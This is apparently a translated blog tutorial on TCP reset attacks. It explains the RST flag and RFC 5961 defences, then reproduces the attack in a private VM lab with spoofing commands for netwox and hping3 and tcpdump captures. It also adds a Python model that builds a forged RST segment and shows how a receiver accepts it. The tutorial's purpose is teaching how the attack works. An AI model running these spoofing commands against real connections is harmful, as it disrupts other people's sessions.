This article is part of the Network Protocol Must-Know series.

How the reset attack works

What is a reset attack

The TCP header carries several flag bits: ACK, RST, SYN, FIN, and so on.

The TCP specification assigns each flag a special meaning when it is set to 1.

For example, SYN=1 appears in the three-way handshake and FIN=1 in the four-way teardown. The reset attack uses the RST flag.

Flag  Meaning
ACK   The acknowledgement number is valid
RST   Reset; tear down an abnormal connection
SYN   Synchronise sequence numbers; used to initiate a connection
FIN   The sender has finished sending

A TCP reset attack works by abusing TCP's RST flag.

In everyday terms

Xiao Ming and Xiao Hong are in love but live far apart, so they write letters, sign their names, and have classmates pass them along.

Later Xiao Gang, who is jealous, secretly writes Xiao Hong a breakup letter and signs Xiao Ming's name.

Xiao Hong believes Xiao Ming really wants to break up and snuffs out the passion in her heart.

When Xiao Ming's next letter arrives, Xiao Hong replies "We've broken up, get lost".

Xiao Ming is heartbroken when he receives the reply.

In the end, Xiao Ming and Xiao Gang live happily ever after.

In technical terms

Once a connection is established, client A and server B each hold the other's sequence numbers. A segment whose source IP address, port numbers and sequence number are consistent with that state is treated as valid and acted upon.

Attacker C, having obtained this information about the A-B connection (both IP addresses, both ports and the current sequence number), forges a segment that appears to come from A, with the RST flag set, and sends it to B.

On receiving the RST, B tears down the connection and discards its state; it sends no reply.

When A next sends data to B as normal, B has no connection matching it and answers with an RST of its own, at which point A also closes the connection.

The sequence number is the hard part. B only honours an RST whose sequence number falls inside its receive window, and hosts implementing RFC 5961 (modern Linux, for example) go further: they reset only if the sequence number equals exactly the next one they expect, and answer an in-window but inexact RST with a challenge ACK instead. An on-path attacker who reads the sequence number off the wire, as in the walkthrough below, side-steps this; an off-path attacker has to guess it.

Hands-on reproduction

The desktop host is 20.1.0.1.

The two VMs are 20.1.0.128 and 20.1.0.132.

Below they are referred to as (1), (128) and (132).

Two attacks are simulated: first with Netwox, then with hping3.

In the Netwox scenario, (128) is the server, (1) is both the client and the attacker, and (132) is the monitoring machine.

In the hping3 scenario, (128) is the server, (1) is the client, and (132) is the attacker.

Most of the detail is in the Netwox section, so read it in order.

Netwox and Wireshark run on (1); hping3 runs on (132).

Netwox attack

  1. On (1), start Wireshark capturing port 22 traffic on the chosen network adapter. SSH from (132) into (128) and run tcpdump there, listening on port 22.

  2. SSH from (1) to the server (128). Wireshark now shows records like the following.

The red line marks the last (1)->(128) TCP segment; the selected packet contains the data we need.

From it we learn that (1) is using source port 58744 and that its next sequence number is 782014969; the two IP addresses we already know.

From here we can launch the attack (as root, since netwox writes the spoofed packet through a raw socket):

netwox 40 -l 20.1.0.1 -m 20.1.0.128 -o 58744 -p 22 -b -q 782014969

-l spoofed source IP address
-m target IP address
-o spoofed source port
-p target port
-b set the RST flag (check the option letters against `netwox 40 --help` on your system)
-q sequence number of the spoofed source, i.e. the number read from the capture

After sending this, look at Wireshark: it shows the forged RST, a fake (1)->(128) RST on which (128) resets the connection.

Some time later (under a minute), the real SSH client on (1) sends its next segment to (128); (128) no longer recognises the connection and answers with an RST.

At that point (1) tears down as well.

The SSH client reports Connection closed by foreign host, not Broken pipe; surprising, isn't it?

So what’s on the monitoring server here

15:15:43.944077 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [.], ack 3474807771, win 2048, length 0
15:15:47.751231 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014917:782014969, ack 3474807771, win 2048, length 52
15:15:47.751716 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [P.], seq 3474807771:3474807855, ack 782014969, win 270, length 84
15:15:47.792409 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [.], ack 3474807855, win 2048, length 0
15:16:10.784854 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [R], seq 782014969, win 0, length 0
15:16:11.623166 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014969:782015005, ack 3474807855, win 2048, length 36
15:16:11.623311 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [R], seq 3474807855, win 0, length 0

Read top to bottom: at 15:15:47 the server's data segment acknowledges 782014969, so that is the sequence number it expects next from (1). At 15:16:10 the forged RST arrives carrying exactly that sequence number, and the server tears the connection down. Less than a second later (1) sends real data (seq 782014969:782015005) to a connection the server no longer has, and the server answers with an RST of its own, which is what kills the SSH session on (1).

So you can also verify a TCP reset attack yourself just by watching it in tcpdump.
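The following is an added example, my own code rather than anything from the original article, netwox or hping3. It models both the mechanism described under "In technical terms" and the walkthrough just captured: it builds the forged RST segment byte for byte, with a valid TCP checksum over the IPv4 pseudo-header, and feeds it to a minimal model of the server's acceptance check, using the addresses, ports and sequence numbers from the capture above as constructed input. It goes one step beyond the page: the receiver model has a switch for the RFC 5961 behaviour of modern kernels, where an RST that is in-window but not exactly at the next expected sequence number gets a challenge ACK instead of a reset, so you can see why the sequence number read from the capture had to be exact. Nothing is sent on the wire; the `TcpReceiver` class and `forged_rst_verdict` helper are illustrative names, not a real API.

```python
import socket
import struct

# TCP flag bits (the header bits that netwox/hping3 set with their RST options)
TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10
SEQ_MOD = 1 << 32

# Values taken from the tcpdump capture above (constructed test input, not live traffic)
CLIENT_IP, CLIENT_PORT = "20.1.0.1", 58744
SERVER_IP, SERVER_PORT = "20.1.0.128", 22
SERVER_RCV_NXT = 782014969   # the "ack" in the server's last data segment
SERVER_RCV_WND = 270         # the "win" the server advertised in that segment


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 internet checksum: one's complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    """IPv4 pseudo-header that the TCP checksum also covers (src, dst, zero, proto, length)."""
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len))


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, window=0, payload=b""):
    """Serialise a 20-byte TCP header (no options) plus payload, with the checksum filled in."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    csum = ones_complement_sum(pseudo_header(src_ip, dst_ip, len(hdr) + len(payload)) + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def parse_segment(segment: bytes) -> dict:
    sport, dport, seq, ack, _off, flags, window, csum, _urg = struct.unpack("!HHIIBBHHH", segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "window": window, "csum": csum}


def checksum_ok(src_ip, dst_ip, segment) -> bool:
    # Summing the whole segment with its checksum in place must come out to zero.
    return ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


class TcpReceiver:
    """One ESTABLISHED connection from the receiving host's point of view (hypothetical model)."""

    def __init__(self, local_ip, local_port, peer_ip, peer_port, rcv_nxt, rcv_wnd, rfc5961=True):
        self.local = (local_ip, local_port)
        self.peer = (peer_ip, peer_port)
        self.rcv_nxt, self.rcv_wnd = rcv_nxt, rcv_wnd
        self.rfc5961 = rfc5961          # modern kernels: only an RST at exactly RCV.NXT resets
        self.state = "ESTABLISHED"

    def in_window(self, seq: int) -> bool:
        if self.rcv_wnd == 0:
            return seq == self.rcv_nxt
        return (seq - self.rcv_nxt) % SEQ_MOD < self.rcv_wnd   # modular arithmetic handles wrap-around

    def on_segment(self, src_ip, dst_ip, segment) -> str:
        if not checksum_ok(src_ip, dst_ip, segment):
            return "dropped"                                    # corrupt or badly forged
        h = parse_segment(segment)
        if (src_ip, h["sport"]) != self.peer or (dst_ip, h["dport"]) != self.local:
            return "dropped"                                    # no such connection (4-tuple mismatch)
        if not self.in_window(h["seq"]):
            return "dropped"                                    # the sequence number guess was off
        if h["flags"] & TCP_RST:
            if self.rfc5961 and h["seq"] != self.rcv_nxt:
                return "challenge-ack"                          # RFC 5961: in-window but inexact
            self.state = "CLOSED"
            return "reset"
        return "accepted"


def forged_rst_verdict(seq: int, sport: int = CLIENT_PORT, rfc5961: bool = True) -> str:
    """What 20.1.0.128 does with an RST spoofed from 20.1.0.1 carrying sequence number `seq`."""
    victim = TcpReceiver(SERVER_IP, SERVER_PORT, CLIENT_IP, CLIENT_PORT,
                         SERVER_RCV_NXT, SERVER_RCV_WND, rfc5961)
    rst = build_segment(CLIENT_IP, SERVER_IP, sport, SERVER_PORT, seq, 0, TCP_RST)
    return victim.on_segment(CLIENT_IP, SERVER_IP, rst)


if __name__ == "__main__":
    print(build_segment(CLIENT_IP, SERVER_IP, CLIENT_PORT, SERVER_PORT, SERVER_RCV_NXT, 0, TCP_RST).hex())
    for guess in (SERVER_RCV_NXT, SERVER_RCV_NXT + 100, SERVER_RCV_NXT + 100_000):
        print(guess, forged_rst_verdict(guess), forged_rst_verdict(guess, rfc5961=False))
```

Run it with python3. The exact sequence number 782014969 resets the modelled server whether or not it follows RFC 5961; a guess 100 bytes off is still inside the 270-byte window and would have reset an old-style stack, but a modern one only sends a challenge ACK; a guess far outside the window, or a wrong port, is dropped silently. Putting such a segment on the wire means handing the bytes to a raw socket (or to netwox/hping3 as the page does), which needs root and a spoofed source address.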

hping3 attack

  1. On (1), start Wireshark capturing port 22 traffic on the chosen network adapter. (132) is the attacker and (128) the server.

  2. SSH from (1) to the server (128). Wireshark now shows records like the following.

  3. Then run on (132):

sudo hping3 -a 20.1.0.1 -s 57292 -R 20.1.0.128 -p 22 -M 2042569399 -c 1

-a spoofed source IP address
-s spoofed source port
-R set the RST flag (the target host, 20.1.0.128, is a positional argument)
-p target port
-M sequence number of the spoofed source
-c 1 send a single packet

Mind the case: in hping3, -R is --rst and -M is --setseq, whereas lowercase -r and -m mean --rel and --mtu and would set neither the RST flag nor the sequence number.

Now look at Wireshark: there are already two RST records.

The SSH session on (1) is broken too:

Connection closed by foreign host.

Last words

It took two days, from writing Network Protocol - TCP Three-Way Handshake and Network Protocol - TCP Four-Way Wave to collecting TCP reset attack examples; half the articles online are untested, with only a starting point and a so-called result. The Netwox example came from a foreign university's online courseware and was clearly explained; the hping3 one started from a wrong example and was worked out from the man page notes and by analogy with the Netwox attack that had already succeeded.

What you learn from paper always feels shallow; to truly know a thing you must do it yourself.

One last thing: can you tell which operating system my (132) machine is running 😊?

Conclusion

The above is purely my own view. Given my limited ability, omissions and mistakes are inevitable; if you find bugs or have better suggestions, criticism and corrections are welcome, so please don't hold back.

If you like my article, you can [follow] + [like] + [comment]; your triple support is my motivation to keep going. I look forward to growing together with you ~

Source: Juejin, author ZOUZDC, link https://juejin.cn/post/7028963866063306760. Copyright belongs to the author. For commercial reprints contact the author for authorization; for non-commercial reprints please indicate the source.